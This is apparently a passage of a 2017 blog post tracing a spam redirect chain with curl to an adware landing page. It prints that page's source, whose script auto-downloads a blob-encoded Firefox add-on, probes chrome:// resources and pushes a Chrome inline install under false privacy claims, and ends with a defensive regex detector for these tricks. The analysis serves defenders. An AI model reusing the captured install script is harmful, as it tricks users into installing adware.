< Set-Cookie: redid=7988; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: campaign_id=42; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: gsid=68; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: pid=1597; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: URI=sov%3D627219294%26hid%3Ddtfptlrhfvpd%26amp%253Bs1%3D-1%26amp%253Bs2%3D6342103249%26pid%3D1597%26redid%3D7988%26gsid%3D68%26campaign_id%3D42%26p_id%3D1597%26id%3DXNSX.-r7988-t68%26impid%3D5057a1bc-7d7f-11e7-b7cd-fa245441bcee%26js_enabled%3D0%26init_ev%3D1; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: templateid=3578; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: path=redirect; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: version=645649; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tags[3578][expand_enable]=-1; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tags[3578][alert_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tags[3578][audio_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tags[3578][pop_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tags[645649][expand_enable]=-1; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tags[645649][alert_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tags[645649][audio_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tags[645649][pop_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: content=645649; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: token=d206d59098c1efa7a7c18ab1c6060181; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: rpm=25; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: vid=444390; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: log_627219294=1; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: token=d206d59098c1efa7a7c18ab1c6060181; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: rpm=25; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: payload=…; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: payloadIV=7ef9d6fec22596ba73d6ced5f848f6a5; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: init_ev=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: id=XNSX.-r7988-t68; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: SITE_ID=627219294; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: sov=627219294; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tov=645649; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: mov=downloads.mini; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: redid=7988; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: campaign_id=42; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: gsid=68; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: pid=1597; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< X-Sov: 627219294
< X-Rot: 645649
< Set-Cookie: tags[3578][iframe_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Expires: Mon, 01 Jan 2001 00:00:00 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Set-Cookie: shid=esgmgmssigwqe%7C403026589; expires=Thu, 10-Aug-2017 04:42:52 GMT; Max-Age=3000; path=/; domain=.gdn
<

<html><head><title></title>

<noscript><meta http-equiv='refresh' content='0;url=NEX981privacyassistffUS.html'></noscript><script>"NEX981privacyassistffUS.html" && (window.location = "NEX981privacyassistffUS.html");</script>

<!-- NEX981privacyassistffUS.html --><!-- --><!-- --><!-- --><!-- --><!-- COI464macjuuuliiytdjuuuuliiiUS.html --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- -->

<meta name="robots" content="noindex, nofollow" /></head><body>

</body></html><a href="//alldownloads.hapc.gdn/admin_config" style="display:none"></a><!-- Mini 208 :: 1502337172 -->

Now we again see an attempt to set a large payload, this time via cookie, and refresh to a “privacy assist” page. Hm, I think we’re getting closer to the actual payload…

Weirdly enough the “admin config” link seems empty; perhaps there’s a special code that needs to be input, or only certain IPs can access it.

$ curl -v -v "http://NrRzz.alldownloads.hapc.gdn/NEX981privacyassistffUS.html"
*   Trying 45.76.0.183...
* TCP_NODELAY set
* Connected to NrRzz.alldownloads.hapc.gdn (45.76.0.183) port 80 (#0)
> GET /NEX981privacyassistffUS.html HTTP/1.1
> Host: NrRzz.alldownloads.hapc.gdn
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 302 Found
< Date: Thu, 10 Aug 2017 03:55:54 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
< Set-Cookie: ci_session=JcV9LkTbGbswOHgxP03ZelrFJnwvITl6%2FrLkzs1HDyYuBZuSLQ9YXPdqC7E0JTQ7DL2vomDL8fAlXVxSZASofNr2EsUeJYCHRelBxeXCdtnml5wx7ClERMAdT0cm5nh0ROWszDU%2FYCRPue5X1cmD6Naehpe7YinmygyLwuXrsuM0iSVexgO2Jt%2BurtVwbTF2Fj5VTxKKWd5IiaGuwQFeuEmRbVXFSC12kPpmS4B8lCi2t5YxQQ4gdMEtXHycGiCod%2FEGV%2B8PFDvrMJap%2FF0SCjUhMxnKZHZPk1eaQsnYlJPZ6TfK2ta1PbaFVzK1yASUm%2FY3sOiFXJEphgXyeJLeIg%3D%3D; expires=Fri, 11-Aug-2017 03:55:53 GMT; Max-Age=86400; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< X-Source: Mini
< Set-Cookie: id=noid; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: SITE_ID=93226501; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: sov=93226501; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: tov=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: mov=downloads.mini; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: redid=0; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: campaign_id=0; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: gsid=0; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: pid=0; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: impid=mini4157-7324-4039-8980-883b843d979a; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< Set-Cookie: URI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< X-Rot:
< X-Sov: 93226501
< X-Jump: NEX981privacyassistffUS.html
< X-Jump-Data: a:13:{s:2:"id";s:5:"58767";s:3:"geo";s:2:"US";s:4:"name";s:27:"NextAd Privacy Assist FF US";s:6:"weight";s:3:"100";s:4:"slug";s:28:"NEX981privacyassistffUS.html";s:11:"landingpage";s:77:"http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid={S2S}&aff_id={REDID}";s:5:"subid";s:4:"MINI";s:8:"redirect";s:2:"JS";s:4:"type";s:17:"Privacy Assist FF";s:8:"offer_id";s:0:"";s:7:"network";s:3:"981";s:7:"account";s:4:"1287";s:3:"pos";s:3:"100";}
< X-Jump-Redirect: http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid={S2S}&aff_id={REDID}
< X-Jump-Vars: a:2:{i:0;a:2:{i:0;s:5:"{S2S}";i:1;s:3:"S2S";}i:1;a:2:{i:0;s:7:"{REDID}";i:1;s:5:"REDID";}}
< Set-Cookie: cl=f2cd5f63-2085-478a-a955-5a7bcad3a87a; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn
< X-Jump-To: http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid=f2cd5f63-2085-478a-a955-5a7bcad3a87a&aff_id=0
< Expires: Mon, 01 Jan 2001 00:00:00 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Location: http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid=f2cd5f63-2085-478a-a955-5a7bcad3a87a&aff_id=0

Whee, off we go again with a 302 redirect to n3xt.io; registered by GoDaddy, DNS by Amazon Route53, and again dual-homed IPs to AWS. Seems a lot of these scammers like hosting on Amazon infrastructure with second-tier VPS hosts layered between for indirection.

$ host n3xt.io
n3xt.io has address 54.183.45.103
n3xt.io has address 54.183.112.92

Let’s see what’s here.

$ curl -v -v "http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid=f2cd5f63-2085-478a-a955-5a7bcad3a87a&aff_id=0"
*   Trying 54.183.112.92...
* TCP_NODELAY set
* Connected to n3xt.io (54.183.112.92) port 80 (#0)
> GET /path/lp.php?trvid=10076&trvx=39ae0019&cid=f2cd5f63-2085-478a-a955-5a7bcad3a87a&aff_id=0 HTTP/1.1
> Host: n3xt.io
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 302 Moved Temporarily
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Cache-control: no-cache="set-cookie"
< Content-Type: text/html
< Date: Thu, 10 Aug 2017 03:56:13 GMT
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< location: http://cw.privacyassistant.net/ext/recommended?cid=8gb7mi6np8wd&trs=YTZ&cont=USA&c=10076&z=0
< Pragma: no-cache
< Server: Thrive-01766a2d11972f080-us-west-1
< Set-Cookie: THRIVE_SESS=cbkoinkmp2u0bc92b5k7rf6711; expires=Fri, 11-Aug-2017 03:56:13 GMT; Max-Age=86400; path=/; domain=.n3xt.io
< Set-Cookie: ClickId=8gb7mi6np8wd; expires=Sat, 09-Sep-2017 03:56:13 GMT; Max-Age=2592000; path=/; domain=.n3xt.io
< Set-Cookie: OfferPage=http%3A%2F%2Fcw.privacyassistant.net%2Fext%2Frecommended%3Fcid%3D8gb7mi6np8wd%26trs%3DYTZ%26cont%3DUSA%26c%3D10076%26z%3D0; expires=Sat, 09-Sep-2017 03:56:13 GMT; Max-Age=2592000; path=/; domain=.n3xt.io
< Set-Cookie: OfferID=1046; expires=Sat, 09-Sep-2017 03:56:13 GMT; Max-Age=2592000; path=/; domain=.n3xt.io
< Set-Cookie: clickData=eJyNU9tq20AQ%2FZWwD6aFWFfrYoMJaUJpIO1D3VBaBGW8O7KXyLtid6XEDf73zq7cEOhLEVhz88yZc0YvzA7bO8FWrN5tq4MsVV8%2FCXbJOBx6H0%2BTpCovmdWD4egDOXkdKCHVzrvJq3cLDqm%2BSLI8r%2Bi5ZLpt0UxNFuXZfTAdDds716%2BauIn5U9QbOQI%2FgrXSOlAuUuiaGJ%2FpxyDXhwMqgeKKS7F%2Bi3HmjF3%2F%2BPZzxrVy64fN9YyvA9jZ73XCztP%2BxdTDUQ8u4OaDMaj4kfA8bG79zlqNbNVCZ3Fypr9TqTOg7J2wVEp1BscQHaWVThu2emGyp1S2iIooreooLSoqgx0qt3GU96O6Jq6iYhF5bMTYbqD01K7THLqzjSN09zgikVTR2GPv4wLto9O9X%2BqMYERjpVaTszX6yaIfc0NjQoAUmXIHLXwvbwocJccvcDiPktZjvtEHDtZd3MCWMIS1FXI3NQ%2FBJr7d3Dfxd%2FlR%2Brx0nrANqIvPxI4OdOz%2Blney1UZJCI0E5oHa61BDagSM5AxGktHEPbh9E3d91O%2F7K2dGUnhSkOzndb4ETJJ0OfPKtxkXRVvm8yypi%2FmiqmEOy6KYF1BtOYgc6gpm0La%2FqDZhJ9pOOTQKOi8O13ZSnI4qBMPB%2F09LT3VCtaGldnsMYgvcDjtvmKHDDwbh0cvyLluk2Sqba%2Fv%2BXZmVi8kMuwtJl%2By%2BakLBlFbou%2B0DKKbyZxdJT6O13evxGew7yeljCLfl0SZpVZaQiTRdVlmb1Mlb4gc7f0Lr5ik7nV7P8hPYPeWKbZHwKhUpsSkWecXzRLT1EosSW16IMsOc3mnNTn8A09c7MQ%3D%3D; expires=Sat, 09-Sep-2017 03:56:13 GMT; Max-Age=2592000; path=/
< Set-Cookie: AWSELB=E5EB9F1D14A57CA891D30EE50AEEC823B3A902F4EA724622E026F5AFE13FCE21AC3365562D7C10FE4E7B3025153BC728BC0A5EA2695BE5385EFBD54641946EEC51E459C4BB;PATH=/
< Content-Length: 0
< Connection: keep-alive

Okay, now we get our final client redirect to the “client” site, PrivacyAssistant.net which “provides additional information to your search results”. Got it; we’re going to have an extension that injects new ads in our search results. And so here comes the money shot, complete with the attempted drive-by Firefox auto-install of their plugin:

```text
$ curl -v -v "http://cw.privacyassistant.net/ext/recommended?cid=8gb7mi6np8wd&trs=YTZ&cont=USA&c=10076&z=0"
* Trying 23.23.203.84...
* TCP_NODELAY set
* Connected to cw.privacyassistant.net (23.23.203.84) port 80 (#0)
> GET /ext/recommended?cid=8gb7mi6np8wd&trs=YTZ&cont=USA&c=10076&z=0 HTTP/1.1
> Host: cw.privacyassistant.net
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Content-Type: text/html; charset=UTF-8
< Date: Thu, 10 Aug 2017 03:56:29 GMT
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Pragma: no-cache
< Server: Apache
< Set-Cookie: PHPSESSID=bgoo24o8o6ufg63a7775494aa2; path=/; domain=.privacyassistant.net
< Set-Cookie: cont=USA; expires=Sat, 09-Sep-2017 03:56:29 GMT; Max-Age=2592000; path=/; domain=.privacyassistant.net
< Set-Cookie: cid=8gb7mi6np8wd; expires=Sat, 09-Sep-2017 03:56:29 GMT; Max-Age=2592000; path=/; domain=.privacyassistant.net
< Set-Cookie: off_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.privacyassistant.net
< Set-Cookie: br=chrome; expires=Sat, 09-Sep-2017 03:56:29 GMT; Max-Age=2592000; path=/; domain=.privacyassistant.net
< Content-Length: 25621
< Connection: keep-alive
<
<!DOCTYPE html>
<html>
<head>
<title>Improve Browser Security</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style5.css">
<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/oofhoenjnigkpkkdnplfcbjapgcolpdm" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<script src="jquery.min.js"></script>
<script>
function repEvent(ec="0",ea="0",el="0"){
  $.post("/ext/cevent.php?"+new Date().getTime(),{'ec':ec,'ea':ea,'el':el});
}
function repView(pg="dl"){
  $.get("/ext/cview.php?pg="+pg+"&" + new Date().getTime());
}

var ffLoop = { active: true, attempts: 0, maxAttempts: 1000 };
function dl(){
  dll = getCookie('dl');
  if(location.hostname.split('.')[0] == 'd' && dll != ''){
    $('.app').show();
    $('#dlmsg textarea').val(dll);
    $('#dlmsg').fadeIn();
    $("#dlmsg").find('textarea').select();
    return true;
  }
  return false;
}
function getCookie(c_name) {
  var i, x, y, ARRcookies = document.cookie.split(";");
  for (i = 0; i < ARRcookies.length; i++) {
    x = ARRcookies[i].substr(0, ARRcookies[i].indexOf("="));
    y = ARRcookies[i].substr(ARRcookies[i].indexOf("=") + 1);
    x = x.replace(/^\s+|\s+$/g, "");
    if (x == c_name) {
      return unescape(y);
    }
  }
}
function base64toBlob(base64Data, contentType) {
  var byteCharacters = atob(base64Data);
  var byteNumbers = new Array(byteCharacters.length);
  for (var i = 0; i < byteCharacters.length; i++) {
    byteNumbers[i] = byteCharacters.charCodeAt(i);
  }
  var byteArray = new Uint8Array(byteNumbers);
  return new Blob([byteArray], { type: contentType });
}
function isFirefoxInstalled(){
  var img = document.createElement('img');
  img.addEventListener("load", function (e) {
    window.location.href = 'https://www.searchassist.net/';
  });
  img.setAttribute("src", "chrome://searchassistincognito/content/skin/images/ping.png");
}
function checkFirefoxInstall() {
  setTimeout(function () {
    var img = document.createElement('img');
    img.addEventListener("load", function (e) {
      ffLoop.active = false;
      $.get('hoconv.php?cont=USA&br=chrome&cid=8gb7mi6np8wd&off_id=');
      setTimeout(function(){
        if(location.hostname.split('.')[0] != 'd'){
          window.location.href = '/';
        } else {
          $('#element_to_pop_up').fadeOut();
          dl();
        }
      }, 2000);
    });
    img.addEventListener("error", function (e) {
      ffLoop.attempts++;
      if (ffLoop.attempts != ffLoop.maxAttempts)
        checkFirefoxInstall();
    });
    img.setAttribute("src", "chrome://searchassistincognito/content/skin/images/ping.png");
  }, 200);
}
function startInstall() {
  isClick = true;
  isClickNow = true;
  //showHelper();
  checkFirefoxInstall();
  var a = document.createElement('a');
  a.style = "display: none";
  var url = window.URL.createObjectURL(base64toBlob("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", "application/x-xpinstall"));
  a.href = url;
  a.target="_top";
  document.body.appendChild(a);
  a.click();
  return false;
}
$(document).ready(function(){
  if(location.hostname.split('.')[0] == 'cw'){
    setTimeout(function(){
      // alert("ATTENTION: Your searches might be tracked. To continue browsing safely you should install the extension.");
    }, 1000);
  }
  $('.searchasist-back').fadeIn(500);
  $("#dlmsg").find('textarea').on('focus click', function() {
    $(this).select();
  });
  repView('lpchr');
  $('body').on('click', '#skip2', function(){
    close();
    if(location.hostname.split('.')[0] != 'd')
      window.location.href = '/';
    else
      dl();
    //$('.loader').show();
  });
  $('body').on('mousedown', ':not(.inst)', function(){
    $('.loader, .overlay1').hide();
    $('#element_to_pop_up').fadeOut();
  });
  $('body').on('click', '.inst', function(){
    close();
    $('.loader, .overlay1').show();
    $('#hlp').fadeIn(1500);
    chrome.webstore.install('https://chrome.google.com/webstore/detail/oofhoenjnigkpkkdnplfcbjapgcolpdm', function(){
      dl();
      //$.get('hoconv.php?cont=USA&br=chrome&cid=8gb7mi6np8wd&off_id=');
      $('#hlp').fadeOut();
    }, function(reason){
      dl();
      $('.loader, .overlay1').hide();
      $('#hlp').fadeOut();
      $('.box .content').click();
    });
    return false;
  });
});
</script>
<link rel="shortcut icon" href="img/fav.png">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
</head>
<body class="searchasist">
<div class="overlay overlay1" style="display:none;color: #000; opacity: 0.5; z-index:99999;"></div>
<div id="searchasist-bg_bb" style="display: block;"></div>
<div class="searchasist-wrap"><div class="genOverlayBg"><p class="extension-text bounce">Click "Add Extension"<br> to install</p></div></div>
<div class="searchasist-wrap-ff"><div class="genOverlayBg-ff"><p class="extension-text-ff bounce"><span class="fst">Step 2 : Click "Allow" to proceed</span><br><br><span class="fst">Step 3 : Click "Install" button to add<br>the extension</span></p></div></div>
<div class="searchasist-back" style="display: none">
<div class="wrapper">
<header class="searchasist-header"><p class="searchasist-txt">Maintaining Internet Speed Is Critical, But So Is<br><span><span class="img-box"><img class="track-img" src="img/tracking.png"/></span>Stop Big Companies FromTracking Your Searches</span><span class="steps-head">STEPS: 1/2</span></p></header>
<div class="right"><div class="inner">
<div class="searchasistnote1"><h1>Recommended:</h1></br><p>The SearchAssist extension protect your privacy by detecting searches that maybe tracked and tied to your personal information. It intercepts those searches andredirects them to SearchAssist privacy-enhanced search engine.</p>
</div>
<section class="bottom"><p class="searchasistnote3">By clicking the button below you agree to install SearchAssist Incognito extension and have read and agreed to the <a href="http://www.privacyassistant.net/tos/" target="_blank">EULA</a> & <a href="http://www.privacyassistant.net/privacy/" target="_blank">Privacy Policy</a></p></section>
<button id="button" class="install_extension inst">Install Now </button>
</div></div></div>
<div class="app"><div id="dlmsg" class="detail ready" style="display:none;z-index:99999; box-shadow: 0 5px 30px rgba(0, 0, 0, 0.5); "><div class="content"><div class="desc"><h1 class="file-ready">Your file is ready!</h1><hr> <p class="p-ready">Copy and paste the following link into your browser to download.</p><textarea readonly></textarea></div></div></div></div>
</div>
<div id="element_to_pop_up" style="display:none; position: absolute; top: 120px; left:305px; z-index: 999999; " ><img src="pop-moz.png" alt=""/></div>
<img src="hlp.png" id="hlp" style="display:none; position: absolute; top: 245px; margin: 0 auto;left: 48%; margin-right: -50%; z-index: 999999; " />
<script type="text/javascript">
var $play = $('.play'),
    $detail = $('.box12'),
    $content = $('.content', $detail),
    $close = $('.close');

$('.box .content').click(function(){
  $content.html($(this).html());
  $play.appendTo($content);
  $detail.show();
  $('.poster', $detail).delay(10).queue(function(next) {
    $detail.addClass('ready');
    next();
  });
});

/*--------------------Close--------------------*/
function close(){
  $('.loader, .overlay1').hide();
  $p = $('.box12 ');
  $p.css({top: $p.data('top'),left: $p.data('left'),width: $p.data('width'),height: $p.data('height'),})
  $detail.removeClass('ready').delay(500).queue(function(next){
    $(this).hide();
    $('.poster').removeClass('active');
    next();
  });
}

$close.click(close);
</script>
</body>
```
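A static check a defender could run over a landing page captured this way (with curl, so the script is read rather than executed) to flag the install tricks visible in the source above: the XPI handed to the browser as a blob: URL and clicked by script, the chrome:// image probe that tests whether the add-on is already present, and the chrome.webstore.install inline-install call. This is an added example, not code from the original post or from the site it captures; the indicator names, function names and the constructed sample page are mine, and the sample mirrors the structure of the captured page rather than reproducing it.

```python
import re

# Indicators of the drive-by extension install pattern seen on the captured page.
# Indicator names are this example's own labels, not a standard taxonomy.
INDICATORS = [
    # XPI package handed to the browser as a blob: URL instead of a normal download
    ("xpi_blob", re.compile(r"application/x-xpinstall", re.I)),
    # Chrome inline-install API call (Google has since removed inline installation)
    ("chrome_inline_install", re.compile(r"chrome\.webstore\.install\s*\(")),
    # <link rel="chrome-webstore-item"> that inline install required
    ("webstore_item_link",
     re.compile(r"""<link[^>]+rel=["']chrome-webstore-item["']""", re.I)),
    # chrome:// resource loaded as an image to test whether the add-on is present
    ("chrome_scheme_probe", re.compile(r"""["']chrome://[^"']+["']""")),
    # element appended to the DOM and clicked by script, not by the user
    ("scripted_click",
     re.compile(r"appendChild\(\s*(\w+)\s*\)\s*;?\s*\1\.click\(\)")),
    # base64 payload decoded in-page and wrapped in a Blob
    ("base64_to_blob", re.compile(r"atob\([\s\S]{0,500}?new Blob\(")),
]

def find_driveby_indicators(html: str) -> dict:
    """Map each indicator found in the page source to its matched snippets."""
    found = {}
    for name, rx in INDICATORS:
        hits = [m.group(0)[:60] for m in rx.finditer(html)]
        if hits:
            found[name] = hits
    return found

def risk_level(found: dict) -> str:
    """Coarse triage: a blob-delivered XPI that is clicked by script, or an
    inline install call, is an install attempt; a probe alone only fingerprints."""
    if "xpi_blob" in found and "scripted_click" in found:
        return "high"
    if "chrome_inline_install" in found or "xpi_blob" in found:
        return "medium"
    return "low" if found else "none"

# Constructed sample mirroring the structure of the captured page (not its content).
SAMPLE_PAGE = """<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/EXAMPLEID" />
<script>
function base64toBlob(b64, ct){var s=atob(b64);var a=new Uint8Array(s.length);return new Blob([a],{type:ct});}
function probe(){var img=document.createElement('img');img.setAttribute("src","chrome://exampleext/content/ping.png");}
function startInstall(){var a=document.createElement('a');a.style="display: none";
a.href=window.URL.createObjectURL(base64toBlob("AAAA","application/x-xpinstall"));document.body.appendChild(a);a.click();}
chrome.webstore.install('https://chrome.google.com/webstore/detail/EXAMPLEID', function(){}, function(){});
</script>"""
BENIGN_PAGE = "<html><body><a href='/download'>Download</a><script>console.log('ok')</script></body></html>"
```

Against SAMPLE_PAGE all six indicators fire and the triage comes back "high"; BENIGN_PAGE yields nothing.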

The funny part here is of course that they’re attempting to rail against the tracking infrastructure of big companies while themselves exhaustively using tracking and referral services from a very wide range of companies large and small.

An adware install like this makes more economic sense as a spam endpoint than trying to convince clients to put in a credit card number for an actual porn video; the conversion rates for paid content are very low (there’s lots of free content out there) and porn suffers from chargebacks (“Um, Chase Bank, yeah, that charge was totally not mine…”). So instead of having a 1% shot at a $30 conversion, worth $0.30, they go for a 10% shot at a $0.01/search conversion — at 10 searches a day that’s $35.00 if you keep the client for a year, so a probabilistic value of $3.50. While my math may be a bit off here, the point stands that adware converts reasonably well vs. actual commercial porn upsell. And you can still get a dumb guy to click on something next to a cute girl’s picture, so that’s your high conversion on lead-gen…

The tragic part is that chasing down the abuse reporting endpoints for all of these services is exhausting. I’m sure the fine folks at Amazon (and Google, and Facebook!) don’t want to play such a key role in enabling this stuff, but it’s a lot to keep tracking down and the automated tools are clearly not quite keeping up.

Feedback welcome: what I missed, what I screwed up, and ways we can collectively crack down on this crap as an industry.


Written by dweekly | Published by HackerNoon on 2017/08/10